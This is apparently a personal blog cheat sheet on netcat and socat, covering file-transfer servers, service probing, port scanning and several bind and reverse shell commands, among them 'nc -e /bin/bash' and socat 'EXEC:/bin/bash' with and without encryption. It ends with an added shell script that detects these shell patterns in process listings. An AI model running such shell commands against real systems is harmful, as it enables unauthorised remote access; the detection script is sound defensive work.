Maojui

Attacking servers | Talking to services quickly

2022-08-06

Transferring files

  • HTTP server

    python -m SimpleHTTPServer 8080
    python3 -m http.server 8080
  • FTP server

    # -p : listening port, -w : allow write access (upload), default is read-only
    python -m pyftpdlib -p 2121 -w
    python3 -m pyftpdlib -p 2121 -w

NC (netcat)

  • Connecting to a server

    • TCP server

      # nc <domain_name> <PORT>
      nc host.example.com 80

      # nc [-param] <IP> <PORT>
      nc -nv 127.0.0.1 80
      • -n : Skip DNS name resolution
      • -v : Add some verbosity

      nc -p 31337 -w 5 host.example.com 80
      • -p : Specify source port 31337
      • -w : Timeout of 5 seconds for the connection
    • UDP server

      nc -u host.example.com 53
  • As a server

    • TCP server

      nc -nlvp 4443
      • -l : Create a listener
      • -p : Specify the listening port number
  • Pop shell

    # Linux (needs a netcat build that supports -e)
    nc -nlvp 4444 -e /bin/bash

    # Mac (& connect twice)
    nc -lp 4444 | /bin/bash | nc -lp 4444
    netcat -nlvp 4444 -e /bin/bash
  • Talk to an HTTP server

    printf "GET / HTTP/1.0\r\n\r\n" | nc host.example.com 80
  • Talk to an SMTP server

    # -C : send CRLF line endings, as SMTP expects
    nc -C localhost 25 << EOF
    HELO host.example.com
    MAIL FROM:<[email protected]>
    RCPT TO:<[email protected]>
    DATA
    Body of e-mail.
    .
    QUIT
    EOF
  • Port scanning

    # Range of ports
    nc -zv host.example.com 20-30

    # Specific ports
    nc -zv host.example.com 80 20 22
    • Check which server software is running on each port (sends QUIT and shows each service's banner)

      echo "QUIT" | nc host.example.com 20-30
  • Create and listen on a UNIX-domain stream socket

    nc -lU /var/tmp/dsocket

    # Connect to port 42 of host.example.com via an HTTP proxy at 10.2.3.4, port 8080.
    nc -x10.2.3.4:8080 -Xconnect host.example.com 42

SOCAT

  • Direct connection

    # socat TCP4:<domain/IP>:<PORT> [Output]
    socat TCP4:server.maojui.me:4444 STDOUT
    • Write the received data to a file

      # socat TCP4:<domain/IP>:<PORT> file:<write_response_to>,create
      socat TCP4:server.maojui.me:4444 file:received_secret_passwords.txt,create
    • Connect to a socat encrypted bind shell

      # verify=0 : do not check the server's certificate
      socat - OPENSSL:10.11.0.4:443,verify=0
  • As a server

    # tcp-listen:<PORT>,<param>,... : wait for a connection

    socat TCP4-LISTEN:443 STDOUT
    socat -d -d TCP4-LISTEN:443 STDOUT
    • -d : For more connection detail.

    • -d -d : Show fatal, error, warning, and notice messages.

    • Share a file

      socat TCP4-LISTEN:443,fork,reuseaddr file:secret_passwords.txt
    • Pop shell

      # Hand /bin/bash to the service listening on 127.0.0.1:443
      socat TCP4:127.0.0.1:443 EXEC:/bin/bash
    • Bind shell

      # Give a bash shell to anyone who connects on port 443
      socat -d -d TCP4-LISTEN:443 EXEC:/bin/bash

      # Give a bash shell only to clients connecting on port 443 that present a certificate
      socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=1,fork EXEC:/bin/bash
    • Execute a command on each TCP connection

      # socat -v tcp-listen:10000,fork,reuseaddr,su=ctf EXEC:"$COMMAND"$EXTRA
      socat tcp-listen:4123,fork,reuseaddr,su=ctf EXEC:"python exp.py"
      • su : run the command as this user (ctf)
    • Encrypted shell

      # cert=<cert.pem>
      socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
      • cert : the certificate file (PEM)
      • verify : peer certificate verification for the SSL connection, 0=disable, 1=enable
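A defender-side helper, added here and not part of the original post, that flags the `nc -e` and `socat EXEC:` shell patterns from the Pop shell, Bind shell and Encrypted shell entries above when run over a process listing; the function names are my own and the sample listing is constructed.

```shell
#!/bin/sh
# Added example (not from the original post): classify process command lines
# (e.g. from `ps -eo args=`) that match the shell-over-socket patterns above:
# nc/netcat/ncat with "-e <shell>" or "-c <shell>", and socat with an
# EXEC:/SYSTEM: address that runs a shell. The Mac two-pipe form is not
# detected, since it appears as separate nc and bash processes.

# is_shell_relay CMDLINE -> exit status 0 when the line looks like one
is_shell_relay() {
  cmd=$1
  # netcat family: program name, then -e/-c followed by a *sh binary
  if printf '%s\n' "$cmd" | grep -Eq '(^|[[:space:]/])(nc|netcat|ncat)([[:space:]]|$)' \
     && printf '%s\n' "$cmd" | grep -Eq '(^|[[:space:]])-[ec][[:space:]]+[^[:space:]]*sh([[:space:]]|$)'
  then
    return 0
  fi
  # socat: an EXEC:/SYSTEM: address whose program ends in "sh"
  # (socat address keywords are case-insensitive, hence -i)
  if printf '%s\n' "$cmd" \
     | grep -Eiq '(^|[[:space:]/])socat[[:space:]].*(exec|system):[^[:space:],]*sh([[:space:],]|$)'
  then
    return 0
  fi
  return 1
}

# find_shell_relays: read one command line per line on stdin, print the hits
find_shell_relays() {
  while IFS= read -r line; do
    if is_shell_relay "$line"; then
      printf '%s\n' "$line"
    fi
  done
}

# Constructed sample listing (not real ps output), mixing the page's commands
SAMPLE_PS='nc -nlvp 4444 -e /bin/bash
nc -nv 127.0.0.1 80
socat TCP4:127.0.0.1:443 EXEC:/bin/bash
socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
socat TCP4-LISTEN:443,fork,reuseaddr file:secret_passwords.txt
socat tcp-listen:4123,fork,reuseaddr,su=ctf EXEC:"python exp.py"
python3 -m http.server 8080'

printf '%s\n' "$SAMPLE_PS" | find_shell_relays   # prints the three shell relays
```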